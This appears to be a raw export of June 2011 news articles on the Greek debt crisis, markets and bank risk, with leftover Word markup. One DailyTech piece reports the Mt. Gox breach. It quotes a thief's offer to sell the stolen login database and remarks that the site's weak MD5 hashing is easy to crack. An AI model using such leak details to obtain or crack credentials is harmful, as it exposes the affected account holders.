Amro Private Banking Chief Investment Officer Didier Duret, who manages about $200 billion in Geneva, said in a telephone interview. "It's more or less a reflection of how reluctant investors have been to get back into the equity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Kroger in Cincinnati rose 4.5 percent, the most since October 2009, to $23.99 on June 16. The largest U.S. grocery chain increased its fiscal 2012 earnings forecast to as much as $1.95 a share from $1.92. Analysts, on average, estimated $1.90.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Buy, the world's biggest consumer-electronics retailer, rallied 4.6 percent two days earlier after reporting profit that exceeded analysts' forecasts, helped by rising demand for smartphones. The Richfield, Minnesota-based company reiterated its full-year projection for earnings per share of $3.30 to $3.55, excluding restructuring costs. Analysts predicted $3.47.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Alison Porter at Ignis Asset Management, stocks have priced in prospects for a Greek default and the end of the Fed's bond-buying program.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seeing stable growth, but it is not a strong cyclical recovery," said Porter, who as U.S. equities fund manager in Glasgow helps oversee $123 billion. Still, "valuations in the market should provide some support," she said. "Equities are reasonably well positioned from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Adam Haigh in London, Rodney Yap in Los Angeles and Whitney Kisling in New York. Editors: Chris Nagi, Nick Baker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Alexis Xydias in London at axydias@bloomberg.net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Nick Baker at nbaker7@bloomberg.net; Andrew Rummer at arummer@bloomberg.net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Investing in Growth Stocks Investing in Commodities Stock Options Indian Stock Market The Hong Kong Stock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03:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/stocks-cheapest-in-26-years-as-s-p-500-falls-earnings-rise-18-.html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Europe May Withhold Half of Greek Payment to Pressure Athens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7:33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Germany Presses Greece to Unite Behind Cuts to Escape Default EU Officials to Discuss Greek Plan That Skirts Default Risk EU Officials Set to Discuss Greek Plan That Skirts Default Risk Merkel Heeds ECB on Greece Saying Bondholder Role Voluntary MerkelБ─(tm)s Greek Bondholder Gambit Tested as Sarkozy Visits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G. Neuger and Jonathan Stearns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European governments weighed withholding half of Greece's next 12 billion-euro ($17.2 billion) aid payment, seeking to keep the country solvent while maintaining pressure on the government to slash the debt that pitched the euro area into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may authorize only a 6 billion- euro loan to tide Greece through bond redemptions in July, while further aid hinges on Greek budget cuts, Belgian Finance Minister Didier Reynders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in any case try to release the necessary funds for the short term," Reynders told reporters before a meeting of euro-area finance ministers in Luxembourg that began late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financial brinksmanship ran in parallel with Greek Prime Minister George Papandreou's effort to save his government from collapse and win parliamentary backing for spending cuts, tax increases and state-asset sales needed to keep bailout funds flowing.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Spanish Economy Minister Elena Salgado said the focus is still on paying out the full 12 billion euros, telling reporters after four hours of talks: "You can't divide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 of Seven finance officials, including representatives of euro members Germany, France and Italy, held telephone consultations during the gathering on the Greek crisis, a U.S. official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euro-area finance ministers' meeting coincided with the start of a three-day Greek parliamentary debate in Athens over a confidence vote in a new cabinet at what Papandreou called a "critical crossroads." Papandreou has 155 seats in the 300- seat parliament.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Referendum Call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said he planned to hold a referendum later in the year for changes to the constitution that would reform the political system in the country. The prime minister said his goal was to tackle the root causes of the country's debt and deficits that are "symptoms of the illness, not the cause."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Greek finance minister, Evangelos Venizelos, who was named in a cabinet overhaul three days ago, came to Luxembourg with a "strong commitment" to the planned 78 billion euros in budget cuts that provoked street protests last week. "We can achieve our target thanks to the efforts of our people and thanks to the cooperation and the assistance of our partners," Venizelos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47 percent of 1,208 Greeks surveyed by Kapa Research SA for To Vima newspaper oppose the wage and spending cuts and higher taxes, and want early elections. Almost 35 percent said the package should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‘Ambitious' Overhaul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which as Europe's largest economy is the biggest guarantor of aid packages to Greece, Ireland and Portugal, insists on an "ambitious" economic overhaul in Athens, Finance Minister Wolfgang Schaeuble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surely work on laying the groundwork for paying out the tranche," Schaeuble said. "It also depends on Greece making the necessary decisions with a fundamental consensus of the political parties so that we can be confident that Greece will live up to its commitments."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raised the prospects for a second aid package on June 17 by dropping calls for a mandatory bond exchange that might lead rating companies to declare Greece in default. Chancellor Angela Merkel's concession gave a lift to stocks, bonds and the euro, spurring optimism that Europe would get ahead of the debt crisis that has exposed the weaknesses of the 17-country currency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Germany bowed to European Central Bank and French demands not to compel investors to buy new Greek bonds as old ones expire, the lines are blurry between a "voluntary" and "compulsory" rollover that would lead rating companies to declare Greece in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table are incentives for bondholders to maintain their exposure to Greece, said Luxembourg Prime Minister Jean- Claude Juncker, chairman of the talks. He ruled out an agreement tonight on a new three-year package for Greece, pointing to July for a "final and overall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and Marcus Bensasson in Athens, and Stephanie Bodoni, Andrew Davis, Mark Deen, Rebecca Christie, Rainer Buergin, Kelly Cregg and Anabela Reis in Luxembourg. Editors: James Hertling, Patrick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James G. Neuger in Luxembourg at jneuger@bloomberg.net; Jonathan Stearns in Luxembourg at jstearns2@bloomberg.net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City of London Business of Law Online Payment Alternatives Eastern Europe Investments Business of Beer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03:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/europe-may-withhold-half-of-greek-payment-to-pressure-athens.html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Bitcoin's Largest Exchange, Mt. Gox, Hacked, Closes After Massive Selloff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Currency plunges to virtually nothing as 100,000 Bitcoins move; exchange pledges to undo the damage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storm had been building for over a week now. Last Monday at around 5 p.m. 25,000 Bitcoins were transferred from 478 accounts on the currency's largest exchange - Mt. Gox. But that was just the beginning. Now Mt. Gox is admitting to a major breach and has shut down, in an unprecedented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What Are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a peer-to-peer cryptocurrency.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Invented in 2009 by a shadowy Japanese figure - Satoshi Nakamoto - the coins promise a degree of anonymity against casual tracking attempts (though insecure practices, or more concerted government efforts could still breach your anonymity. Bitcoins are also popular because they do not rely on any one central financial authority and thus represent an anarchistic/nation agnostic financial system of sorts.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seed the market with Bitcoins, the brains behind the project created the concept of "mining" coins - devoting computing resources to finding "blocks" of Bitcoins. Today millions of coins have been "mined" and some people accept Bitcoins as a means of payment, showing that the currency has taken its first steps towards legitimacy.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Likewise, Bitcoins are traded on a number of currency exchanges, the largest of which is Mt. Gox. Mt. Gox allows for the trade of Bitcoins to and from U.S. dollars. The exchange accounts for over 90 percent of Bitcoin trading volume on an average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A Volatile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month the Bitcoin market has exploded, with the currency rising in value from around $1 USD per Bitcoin to around almost $30 USD per Bitcoin at its peak. Bitcoins were expected to slowly deflate over time, but this sudden rise was highly unusual - and unexpected.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chalked it up to misleading media reports which claimed Bitcoin to be a "totally anonymous" currency which could be used to safely "buy drugs" without fear of prosecution (this is expressly not true). Regardless of the source of the interest, the public was becoming interest in Bitcoins and the market was booming.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two Fridays ago the market began a downward plunge, with the price per coin falling nearly in half. Much like the rise, there were no hard at fast explanations for the fall, though speculative theories abounded.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recovered slightly last week, but the level of volatile was alarming as virtually no currency in history had ever seen these kinds of swings.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couple weeks the currency had risen 30-fold in value. And in just two days it had fell in half, returning to about 14-times the May value.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Accounts Breached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couple weeks people began to claim their accounts had been hacked and their Bitcoins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at around 5 pm, 25,000 bitcoins were transferred into account "1KPTdMb6p7H3YCwsyFqrEmKGmsHqe1Q3jg". The coins in question came from 25,000 accounts. Given recent trading values, that would indicate the counts were worth somewhere between $375,000 and $500,000 USD.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Gox's support team insisted such claims were isolated. "Magical Tux" a Tokyo-based member of the support team wrote on Saturday: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 we've been seeing a "lot" of cases recently.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I have 10 known cases of people whose coins were stolen (someone logged in on the account using their password, traded USD for BTC, withdrew all the BTC). Considering we have now over 60000 accounts (2 months ago we had 10 times less), this seems to be a problem coming mainly from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Problem is many have been posting in various places (forums, reddit, twitter, irc, etc) causing a lot of fear among users when the problem is still fairly limited.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Responding to commenters upset about the 25k Bitcoin heist, he comments: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I already replied you, your funds were stolen by someone logging in onto your account with your password. Your funds are right now on a bitcoin address and have not moved since then.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reminder we assume no responsibility should your funds be stolen by someone using your own password.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>... The coins stolen from Mt.Gox were not stolen using any CSRF exploit... [the thieves] logged in on users account using the correct login and password. We have logs showing the loggin succeed on first try.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Mt. Gox's carefree attitude over account theft (e.g. if you lose your password it's your only fault) would only last so long, though. Because a much worse breach was coming.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"Tango Down" - Mt. Gox Closes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weeks, we suggested that the Bitcoin markets cooperate to close trading in cases where extreme volatility (deflationary or inflationary) was observed. Many Bitcoin proponents did not take kindly to this suggesting, saying that closing currency exchanges for market events would be blasphemy and the antithesis of everything the market stood for.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Writes DailyTech user "whitslack":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of shutting down the Bitcoin exchanges when they heat up is just as repugnant to the central idea of Bitcoin as central banks are. Markets do get emotional at times, but that is something we all understand and accept. Shutting down a market is an artificial move that is in opposition to the concept of a free market. If an exchange took up such a policy, it would only incentivize the creation of new exchanges without such an artificial policy. If I can't trade my Bitcoins on Mt. Gox because it has "shut down," I'll simply go to another exchange that hasn't shut down. Even if all the currently existing exchanges colluded to shut down together, they would simply be granting enormous leverage for a newcomer to take all their volume. The concept of artificial market limits has no place in a free economy and cannot stand in one.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Well, friends, Mt. Gox has shut down. On Sunday at about 4 p.m., site official "Mark Karpeles" wrote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will be back to around 17.5$/BTC after we rollback all trades that have happened after the huge Bitcoin sale that happened on June 20th near 3:00am (JST).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should be back by June 20th 11:00am (JST, 02:00am GMT) with all the trades reversed and accounts available.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account with a lot of coins was compromised and whoever stole it (using a HK based IP to login) first sold all the coins in there, to buy those again just after, and then tried to withdraw the coins. The $1000/day withdraw limit was active for this account and the hacker could only get out with $1000 worth of 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this no account was compromised, and nothing was lost. Due to the large impact this had on the Bitcoin market, we will rollback every trade which happened since the big sale, and ensure this account is secure before opening access again.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 REGARDING LEAKED ACCOUNT INFORMATIONS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address this issue too and prevent logins from each users. Leaked information includes username, email and hashed password, which does not allow anyone to get to the actual password, should it be complex enough. If you used a simple password you will not be able to login on Mt.Gox until you change your password to something more secure. If you used the same password on different places, it is recommended to change it as soon as possible.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Several other major Bitcoin exchanges including TradeHill (closed at $13.79 USD per Bitcoin) have stopped showing financial transactions that recently occurred indicating a possible shutdown (though the site Bitcoin Charts reports more recent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What is Known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it is clear that the Mt. Gox database has been stolen. According to one source the database had 61,020 entries - roughly in line with Mt. Gox official MagicalTux's previous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an hour of the hack, reportedly 100,000 Bitcoins were sold at incredibly cheap rates on Mt. Gox, plunging the market from around $17.50 USD per Bitcoin to just $0.01 per Bitcoin. Meanwhile 400,000 other Bitcoins were reported missing.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the same time an unknown party also posted a Pastebin commenting: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hacked into mtgox database. Got a huge number of logins password combos.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Mtgox has fixed the problem now. Too late, cause I've already got the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sell the database for the right price.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Send your offers to: gfc06@hotmail.com Soon after, though the actual database dump was public posted. It's available (for now), via direct download from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MagicalTux Mt. Gox's current protection scheme was to use and MD5 hash on passwords in its database, along with a salt [source]. However, he did not specify whether a single salt was applied to all user passwords, multiple periodic salts, or whether user-specific unique salts were employed.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have reportedly been traced to a Hong Kong IP, according to sources. Of course this could simply be a hijacked server or a proxy server, which the hackers used to obfuscate their true location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some sources are reporting that the salting was not initially used and approximately 1,600 passwords appear unsalted. Cracking unsalted MD5 hashes is a pretty elementary task with rainbow table or brute force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salted passwords could be cracked, given the strength of the salting scheme and how much effort malicious parties put in (the expense in computing time likely wouldn't be worth the Bitcoin payoff - of course, if you were using hijacked machines, it's "free labor" anyways.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Mt. Gox forums users openly mocked the admins and expressed frustration at the site's security practices. Writes one user "Man From The Future": The fact that it uses MD5 is an issue.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should definitely have been set up using SHA256/SHA512, and at least a per user salt(You haven't clarified as to whether it's the same for all, unless I've misread something). Or even double SHA512 two-unique-salts halved.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stated in the press release the exchange says it's undoing the sell transactions currently and is working to restore the market to around $17.50 USD per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 What's Next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the massive breach may not be enough to kill the Bitcoin movement. After all, many people are very dedicated and enthusiastic about the concept of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 recent volatility, combined with this breach raise serious doubts about Bitcoin managing to become mainstream. The fact that the largest exchange in a $130M USD would practice such lax security practices such as failing to use the state of the art hashing methods to protect its database seems disturbing.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a greater underlying problem may be the vulnerability of users' local "wallet" file, wallet.dat. When news of the original Bitcoin hack broke, many assumed that malicious users had infected victims' computers and exposed their wallet.dat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serious Bitcoin aficionados encrypt their wallet.dat file soundly, but as casual interest in Bitcoins explodes, the question remains whether the average, security-ignorant user will practice similar safety precautions.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of virtual currency has been one that has long excited.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cybercurrency was a focus of famous science fiction writer Neal Stephenson's 1995 postcyberpunk novel The Diamond Age: Or, A Young Lady's Illustrated Primer, in which digital cryptocurrency was mentioned as a driving force that eliminated the nation state by destroying their ability to collect taxes from citizens. Mr. Stephenson attacked the topic again in his 1999 book Cryptonomicon, in which protagonist search for gold to use as a basis of a digital cryptocurrency.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one such implementation of this ambitious concept has finally arisen, it's easy to wonder whether Mr. Stephenson could have predicted the future, much as William Gibson predicted the future of the internet, in many ways, with his seminal 1984 cyberpunk work Neuromancer.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order for Bitcoins to truly be a legitimate international currency, there's a lot of work that must be done to improve and protect the technology. In short, it's been a very bad week for Bitcoins; one can only hope this is the last bad news we hear.</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2011.06.20 02:17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.dailytech.com/Bitcoins+Largest+Exchange+Mt+Gox+Hacked+Closes+After+Massive+Selloff/article21942.htm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Greek Default Would Spell ‘Havoc' for Banks a Year After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6:17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 Officials to Discuss Greek Plan That Skirts Default Risk Dombret Sees 2% to 3% Capital Buffer for 30 Largest Banks EU Ministers Set to Clear Way for Greek Payment, Germany Says Merkel, Sarkozy Endorse Б─≤ViennaБ─(tm)-Style Rollover of Greek Debt Basel Said to Weigh 3.5 Percentage-Point Fee Based on Bank Size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Aaron Kirchfeld and Elena Logutenkova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A year after European officials bailed out Greece, investors say the region's banks haven't raised sufficient capital or cut loans enough to withstand the contagion that may follow a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European lenders reduced their risk tied to Greece by 30 percent to $136.3 billion last year by not renewing loans, writing down the value of debt and shifting it off their books, they still have almost $2 trillion linked to Portugal, Ireland, Spain and Italy, figures from the Bank for International Settlements show, leaving them vulnerable if the crisis spreads.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debt situation certainly has the potential to create havoc with the European banking system," said Neil Phillips, a fund manager at BlueBay Asset Management Plc in London, which oversees about $45 billion. "A Greek default and the ramifications of that would be too ghastly for Europe and the European banking system to contemplate right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Chancellor Angela Merkel retreated last week from a confrontation with the European Central Bank that threatened to shove Greece into the euro zone's first sovereign default, softening demands that bondholders be forced to shoulder a big part of a rescue. Questions remain about how any such burden- sharing agreement would work without prompting ratings companies to declare a default and whether Greek Prime Minister George Papandreou can persuade legislators to pass the austerity measures needed for a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Lurching Toward Insolvency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 that Greece was lurching toward insolvency drove the 48-company Bloomberg Europe Banks and Financial Services Index to a one-year low on June 16 and lifted the cost of insuring against default on the sovereign debt of Greece, Ireland and Portugal to record levels.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cost of insuring Greek debt saw the biggest weekly increase last week, while credit-default swaps on National Bank of Greece SA, the country's biggest bank, rose to a record, according to CMA, a data provider owned by CME Group Inc. that compiles prices quoted by dealers in the privately negotiated market. A Greek sovereign default could lead to insolvency of the country's banks and a liquidity crisis as a result of a run on deposits, Standard &amp; Poor's said in a June 15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contagion following a Greek default could play out like this: Refinancing costs for Ireland, Portugal, Spain and possibly Italy and Belgium would soar, thwarting efforts to rein in public deficits and putting states under pressure to restructure their debt as well; banks in countries with weak finances could face a run by depositors, while other lenders would see their capital eroded by credit writedowns; investors would shun equity markets and the euro and seek the safest securities. In a worst-case scenario, panic could freeze credit markets, as happened after the bankruptcy of New York-based Lehman Brothers Holdings Inc. in September 2008.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‘Massacre'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after a year of discussion without conclusion, we conclude there will be a haircut, the next morning the market will massacre Ireland, Portugal and maybe other countries," Federico Ghizzoni, 55, chief executive officer of UniCredit SpA, told journalists in Vienna June 16, referring to a Greek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is already having an impact on European banks. BNP Paribas SA, France's biggest bank, and rivals Societe Generale SA and Credit Agricole SA may have their credit ratings cut by Moody's Investors Service because of their investments in Greece, the ratings company said on June 15. German banks could also be at risk from contagion, Fitch Ratings said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‘Lehman' Situation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56, said on June 17 she would work with the ECB to get Greek creditors to participate in a rescue on a voluntary basis, seeking to appease ECB President Jean-Claude Trichet, 68, who contends that any compulsory move to involve bondholders would trigger a default. The ECB doesn't accept defaulted debt as collateral when providing the cash banks in Greece, Portugal and elsewhere depend on after being shut out of credit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June 18 in Berlin that policy makers must make sure the Greek crisis doesn't infect the rest of the euro region and spark a new global financial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lived through Lehman Brothers," she told a meeting of activists from her ruling Christian Democrat party. "I don't want another such threat to emanate from Europe. We wouldn't be able to control an insolvency."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finance ministers meet in Luxembourg for a second day today to try to hammer out an agreement on a Greek rescue before a Brussels summit of EU leaders on June 23-24.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that euro-area banks holding Greek government bonds will be saddled with losses increased after S&amp;P slapped Greece with the world's lowest sovereign credit rating June 13.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‘Clear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should "absolutely not default," Josef Ackermann, CEO of Frankfurt- based Deutsche Bank AG, said in a June 17 interview in St. Petersburg, Russia. The EU needs to provide more aid to the country if required,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Ackermann, 63, told CNBC the same day that the risk of a Greek default lies in "what is going to happen in other markets and what is going to happen in other countries," concluding that "no one has a clear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Ackermann knows about contagion firsthand. He told an audience in Frankfurt's Congress Center in September 2007 that risks from the U.S. subprime mortgage market were "manageable." The crisis spread to other markets soon after, leading to more than $2 trillion of losses and writedowns worldwide and the collapse of Lehman Brothers a year later.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worst consequence of any Greek sovereign default for German and other European banks would be a sharp increase in general capital market and creditor risk aversion at a time when many banks are still in rehabilitation mode," Michael Dawson- Kropf, a Frankfurt-based Fitch analyst, said in a May 25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Raising Capital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banks have raised 59 billion euros ($84 billion) since stress tests last July, according to calculations by Huw van Steenis, an analyst at Morgan Stanley.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Independent Credit View, a Swiss ratings company that predicted Ireland's banks would need another bailout last year, said in a stress-test study earlier this month that 33 of Europe's biggest banks would need $347 billion of additional capital by the end of 2012 to boost their tangible common equity to 10 percent from 9.1 percent at the end of 2010. The group chose that threshold because it's about 30 percent above the average ratio for the past 10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S&amp;P stress test published in March estimated European banks would need as much as 250 billion euros in fresh capital if faced with a "sharp" increase in yields and a "severe" economic downturn.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French Banks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lenders had the highest overall foreign claims on Greek borrowers of $56.7 billion, including $15 billion in public debt, at the end of 2010, data from the BIS showed. French banks had $589.8 billion of loans tied to Ireland, Italy, Portugal and Spain.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lenders were the biggest foreign owners of Greek government debt with $22.7 billion in holdings last year and had the second-most overall claims, the BIS said. Their claims on Ireland, Italy, Portugal and Spain amounted to $498.8 billion. The two countries hold more than 60 percent of all foreign claims on Greece, according to BIS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in the two countries have lowered their risk tied to Greek public debt by 25 percent to $37.6 billion from the end of March 2010 through December. The main reason for the decline is companies letting bonds or loans expire without renewing them, according to Lutz Roehmeyer, who helps manage about $17 billion at Landesbank Berlin Investment in Berlin. Lenders also have been writing down the value of Greek holdings, setting aside provisions and moving assets into so-called bad banks, as well as selling shares to boost reserves,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‘Direct Hit' Manageable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 hit from Greece is manageable because investors have had time to prepare, but contagion to other countries is the big risk," Roehmeyer said. "If the crisis spreads to Ireland, Portugal and Spain, it would be too big for the banks to shoulder."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impact of credit-default swaps, which led to the near- collapse of American International Group Inc. in 2008, may be limited in a Greek default. Credit-default swaps on Greek sovereign debt cover a net notional $5 billion, according to the Depository Trust &amp; Clearing Corp., which runs a central registry that captures most trades. That's only 1 percent of the government's $482 billion of bonds and loans outstanding, according to data compiled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Swaps on Italian sovereign debt cover a net notional $25 billion, the most of any country or company in the world, according to DTCC. That compares with $2.3 trillion of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banks have already had to write down the value of their Greek bond holdings as they have fallen in the market, said Florian Esterer, who helps manage more than $60 billion at Swisscanto Asset Management AG in Zurich.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problem that we have is less to do with the loss of Greece as such and more to do with the question of what would happen to other countries," Esterer said. "The risk of contagion is probably exactly the same as a year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Adam Ewing in Stockholm, Boris Groendahl in Vienna, Jana Randow in Frankfurt, Charles Penty in Madrid and John Glover in London. Editors: Frank Connelly, Robert Friedman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Aaron Kirchfeld in Frankfurt at akirchfeld@bloomberg.net; Elena Logutenkova in Zurich at elogutenkova@bloomberg.net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Frank Connelly at fconnelly@bloomberg.net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The Big Business of Synthetic Highs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Bank for International Settlements Bailout Banking Industry Online Banking Buying a Foreclosed Home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02:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/greek-default-would-spell-havoc-for-banks-a-year-after-bailout.html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Inflation Risks Continue to Challenge Philippines, Tetangco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5:04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Philippines Still Faces Inflation Risks, Tetangco Says ECBБ─(tm)s Trichet Says Widening Imbalances Challenge Policy Makers Beijing May New Home Prices Rise 2.1% From Year Ago, Agency Says India Signals Slower Pace of Rate Increases on Global Risks Cebu Air, Energi, Honam, Merge: Asia Ex-Japan Stock Preview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Joel Guinto and Cecilia Yap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The Philippines continues to face risks from inflation and the central bank is closely monitoring inflows and liquidity levels, Governor Amando Tetangco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still risks that can affect inflation, but right now we would like to first assess the impact of the measures we have adopted," Tetangco told reporters in Laguna province, south of Manila, yesterday. This year's inflation target of 3 percent to 5 percent is "still at risk," prompting policy makers to raise banks' reserve requirement ratio this month,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16, Bangko Sentral ng Pilipinas ordered lenders to set aside more money as reserves while keeping its overnight rate unchanged at 4.5 percent after raising the benchmark by a combined half a percentage point in its two previous meetings. Higher food and oil prices have prompted policy makers in Asia to increase borrowing costs and their currencies to gain to combat inflation even amid prospects of slowing global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bank's recent actions are "part of the normalization of monetary policy," Tetangco said. "The question is, whether there is going to be a need for further action moving forward."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 Sentral cut banks' reserve requirement ratio by 2 percentage points to 19 percent in November 2008 and a month later started cutting the benchmark rate to help spur growth amid a global slowdown. That easing cycle reduced the overnight rate by a total of 200 basis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reserve ratio will rise to 20 percent starting June 24, the central bank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Dependent'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 further rate increase will be data dependent," said Jonathan Ravelas, chief strategist at Banco de Oro Unibank Inc. in Manila, the nation's largest lender. "Raising the reserve ratio has an immediate effect of siphoning liquidity," said Ravelas, who predicts another quarter-point increase in the third quarter.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 Sentral is monitoring oil and food prices and will "keep an eye on liquidity." A easing of monetary policy in the U.S. may boost inflows to emerging markets such as the Philippines,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Money-supply rose 7.3 percent in April from a year earlier, the slowest pace in more than two years. That reflected the drop in public-sector spending during the period, Tetangco said. The government will "jack up" spending in the second half, Budget Secretary Butch Abad said on June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of the government is to increase spending, so we'll see how that's going to affect liquidity," Tetangco said. "The U.S. may decide to keep easy monetary policy longer, in which case that may lead to an increase in inflow of capital to the emerging markets. We need to watch that also."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prices in the Philippines climbed 4.5 percent last month from a year earlier, the biggest increase since April 2010. The $161 billion Asian economy expanded 4.9 percent last quarter, the smallest gain since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central bank forecasts indicate a lower inflation path and that expectations have shown some signs of leveling off, the central bank said on June 16.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Clarissa Batino in Manila. Editors: Paul Tighe, Richard Dobson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Cecilia Yap in Manila at cyap19@bloomberg.net; Clarissa Batino in Manila at cbatino@bloomberg.net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Marketing Challenges Risk Management Inflation General Motors India Offshore Outsourcing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http://www.businessweek.com/news/2011-06-19/inflation-risks-continue-to-challenge-philippines-tetangco-says.html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Bomb Threat on US Airways Flight to Washington Sparks Probe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5:51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Taliban-U.S. Talks Б─≤Very Preliminary,Б─(tm) Defense Chief Says Karzai Says U.S. Holding Talks With Afghan Taliban Guerrillas United Airlines Resumes Flights Today After Computer Outage U.S. Mayors Find Few Recovery Signs as Cutbacks Pose New Risks UPS Says U.K. Bars Cargo Screening at Some Sites on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Larkin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no explosives in first, third paragraphs.)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A US Airways Group Inc. commuter jet was sequestered after landing near Washington because of a bomb threat, U.S. authorities said. No explosives were found.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Flight 2596 from Dayton, Ohio, landed in a remote section of Ronald Reagan National Airport in Arlington, Virginia, this afternoon, the Transportation Security Administration said in a statement. The Federal Bureau of Investigation checked the plane and interviewed the 44 passengers.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sweep of bags using bomb-sniffing dogs "resulted in negative results," said Nico Melendez, a TSA spokesman. The person made the threat at a ticket counter in Dayton after the flight had departed for Washington. The person is in custody and under investigation, the FBI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working with the TSA, FBI and local law-enforcement officers to investigate the matter," Tina Swail, a spokeswoman for Tempe, Arizona-based US Airways, said by telephone.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plane landed at 1:13 p.m. local time, 8 minutes later than scheduled, according to flightstats.com. All flights at Reagan National were grounded for about 12 minutes around 1:30 p.m., according to a report by WTOP.com, a local all-news radio station that provides traffic and weather.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Andrea Snyder, Ann Hughey.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Larkin in Washington at clarkin4@bloomberg.net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Economy Marketing to Moms Washington Mutual Tobacco Marketing to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http://www.businessweek.com/news/2011-06-19/bomb-threat-on-us-airways-flight-to-washington-sparks-probe.html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London Tube Drivers Start Six-Hour Strike Action Tonight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4:52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NATO Probing Libyan Claims of Civilian Deaths in Tripoli United Airlines Resumes Flights Today After Computer Outage Tepco Halts Water Decontamination as Cesium Absorption Limited UPS Says U.K. Bars Cargo Screening at Some Sites on Security NJ Transit Says Trains to and From NYC Delayed Up to 45 Minutes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Ben Livesey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London Underground drivers began the first of four planned strikes tonight, with today's industrial action starting at 9 p.m. local time and scheduled to end at 3 a.m., Geoff Martin, a spokesman for the Rail, Maritime and Transport Workers union, said by telephone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Ben Livesey at blivesey@bloomberg.net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City of London Starting a Business London Metal Exchange (LME) Bootstrapping a Startup Young entrepreneurship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http://www.businessweek.com/news/2011-06-19/london-tube-drivers-start-six-hour-strike-action-tonight.html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Europe May Withhold Half of Greek Payment to Push Athens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6:00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Germany Presses Greece to Unite Behind Cuts to Escape Default EU Officials to Discuss Greek Plan That Skirts Default Risk EU Officials Set to Discuss Greek Plan That Skirts Default Risk Merkel Heeds ECB on Greece Saying Bondholder Role Voluntary MerkelБ─(tm)s Greek Bondholder Gambit Tested as Sarkozy Visits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G. Neuger and Jonathan Stearns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Spanish minister's comment in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European governments weighed withholding half of Greece's next 12 billion-euro ($17.2 billion) aid payment, seeking to keep the country solvent while maintaining pressure on the government to slash the debt that pitched the euro area into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may authorize only a 6 billion- euro loan to tide Greece through bond redemptions in July, while further aid hinges on Greek budget cuts, Belgian Finance Minister Didier Reynders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in any case try to release the necessary funds for the short term," Reynders told reporters before a meeting of euro-area finance ministers in Luxembourg tonight.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financial brinksmanship ran in parallel with Greek Prime Minister George Papandreou's effort to save his government from collapse and win parliamentary backing for spending cuts, tax increases and state-asset sales needed to keep bailout funds flowing.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Spanish Economy Minister Elena Salgado said the focus is still on paying out the full 12 billion euros, telling reporters after four hours of talks: "You can't divide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Tonight's euro-area finance ministers' meeting coincided with the start of a three-day Greek parliamentary debate in Athens over a confidence vote in a new cabinet at what Papandreou called a "critical crossroads." Papandreou has 155 seats in the 300-seat parliament.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said he planned to hold a referendum later in the year for changes to the constitution that would reform the political system in the country. The prime minister said his goal was to tackle the root causes of the country's debt and deficits that are "symptoms of the illness, not the cause."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Commitment'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Greek finance minister, Evangelos Venizelos, who was named in a cabinet overhaul two days ago, came to Luxembourg with a "strong commitment" to the planned 78 billion euros in budget cuts that provoked street protests last week. "We can achieve our target thanks to the efforts of our people and thanks to the cooperation and the assistance of our partners," Venizelos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47 percent of 1,208 Greeks surveyed by Kapa Research SA for To Vima newspaper oppose the wage and spending cuts and higher taxes, and want early elections. Almost 35 percent said the package should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which as Europe's largest economy is the biggest guarantor of aid packages to Greece, Ireland and Portugal, insists on an "ambitious" economic overhaul in Athens, Finance Minister Wolfgang Schaeuble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‘Fundamental Consensus'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surely work on laying the groundwork for paying out the tranche," Schaeuble said. "It also depends on Greece making the necessary decisions 